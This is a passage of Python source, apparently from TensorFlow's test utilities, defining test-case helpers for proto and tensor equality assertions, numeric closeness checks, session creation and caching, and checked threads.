msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b, msg)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements")
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
